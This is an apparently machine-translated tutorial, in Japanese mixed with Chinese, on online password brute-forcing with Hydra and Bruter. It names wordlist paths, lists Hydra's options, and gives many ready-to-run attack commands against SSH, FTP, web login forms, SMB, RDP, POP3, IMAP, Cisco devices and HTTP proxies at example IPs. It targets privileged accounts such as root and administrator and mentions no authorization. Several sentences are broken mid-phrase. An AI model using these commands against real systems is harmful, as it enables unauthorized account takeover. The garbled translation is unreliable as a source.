CS暴力的な推測
ソフトウェア、データベース、オペレーティングシステム、3389関連の亀裂を指します。C / Sはクライアント/サーバーです。sshftp
sql-server mysql などのC / Sアーキテクチャに基づくアプリケーションです。これらのサービスは多くの場合、高特権ユーザーを提供し、この高特権ユーザーはコマンド操作を実行できます。 sql-serverのsa、mysqlのルート、sys、およびoracleのシステムアカウントなど、これらの高特権ユーザーの使用は、開発者に大きな利便性をもたらす可能性がありますが、パスワードが解読されると、発生する被害も非常に大きくなります。 。C / Sアーキテクチャは主にクラックツールを使用しましたHydra、Bruter、X-scan
ウィンドウの下にブリュターを使用することをお勧めします
アドレスを追加し、プロトコルを選択します(ターゲットLinuxの場合はSSH2、Windowsの場合はSMB、データベースの場合はMYSQL、メールボックスの場合はPOP3)、ポート(ヒント:Linuxのデフォルト22、わからない場合はnmapを使用してスキャンします) SSH2)
Linuxのデフォルトのユーザー名は、通常のウィンドウのルートである管理者がされ
た辞書を選択(注中国のディレクトリをサポートしていません)
スタートは
また、ネイティブの機能を使用することができます
セットパスワードの長さにします
Linuxではhydraを使用することをお勧めします
Kaliが付属し
ています。自分でダウンロードしてインストールすることもできます
。hydra-gtkはグラフィカルインターフェースです
。hydraは、有名なハッカーグループthcが提供するオープンソースのブルートフォースパスワード解読ツールで、複数のパスワードをオンラインで解読できます。公式サイト:http://www.thc.org/thc-hydra
Kailパスワード辞書
/usr/share/wfuzz/wordlist/others/names.txt
/usr/share/wfuzz/wordlist/others/common_pass.txt
このインターフェースのユーザー名とパスワードリストファイルを指定します。ここでは、Kaliシステムに存在するユーザー名と
パスワードリストファイルを使用しますまた、[ユーザーをループする]オプションを選択します。このうち、ユーザー名とパスワードのファイル
は/usr/share/wfuzz/wordlist/others/names.txtと
/usr/share/wfuzz/wordlist/others/common_pass.txtに保存されています
パラメータ
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用 SSL 链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户名,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
一般都是加上的
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P 参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M 参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为 16。 -w TIME 设置最大超时的时间,单位秒,默认是 30s。 -v / -V 显示详细过程。
server 目标 ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 l
dap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp
rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd fi
rebird ncp afp 等等。
OPT 可选项
使用例
1.手动创建用户名字典和密码字典,需要利用密码字典生成器生成强大的字典
2.破解 ssh:
#hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.8 sshが
正常にクラックされ、結果が直接表示されます。-oオプションを使用して、結果出力ファイルを指定することもできます。
#hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh
1.破解 ssh:
# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
# hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
2.破解 ftp:
# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认 16) -vV
# hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3.get 方式提交,破解 web 登录:
# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
4.post 方式提交,破解 web 登录:
# hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username =^USER^&password=^PASS^&submit=login:sorry password"
# hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "log in.php:id=^USER^&passwd=^PASS^:wrong username or password"
(参数说明:-t 同时线程数 3,-l 用户名是 admin,字典 pass.txt,保存为 out.txt,-f 当破解了一个密码就停止, 10.36.16.18 目标 ip,http-post-form 表示破解是采用 http 的 post 方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。)
5.破解 https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6.破解 teamspeak:
# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
7.破解 cisco:
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8.破解 smb:
# hydra -l administrator -P pass.txt 10.36.16.18 smb
9.破解 pop3:
# hydra -l muts -P pass.txt my.pop3.mail pop3
10.破解 rdp:
# hydra ip rdp -l administrator -P pass.txt -V
11.破解 http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18
12.破解 imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra-gtkの使用について
图形化界面界面比较简单,直接填写IP,设置字典,设置协议等
就可以开始了
補足
ブラストソフトウェアの選択は、主に速度、安定性、サポートされるプロトコルの数に依存します。
このブルートフォースパスワードクラッキングツールは非常に強力で、ほとんどすべてのプロトコルのオンラインパスワードクラッキングをサポートします。パスワードをクラック
できるかどうかは、辞書が十分に強力かどうかによって異なります。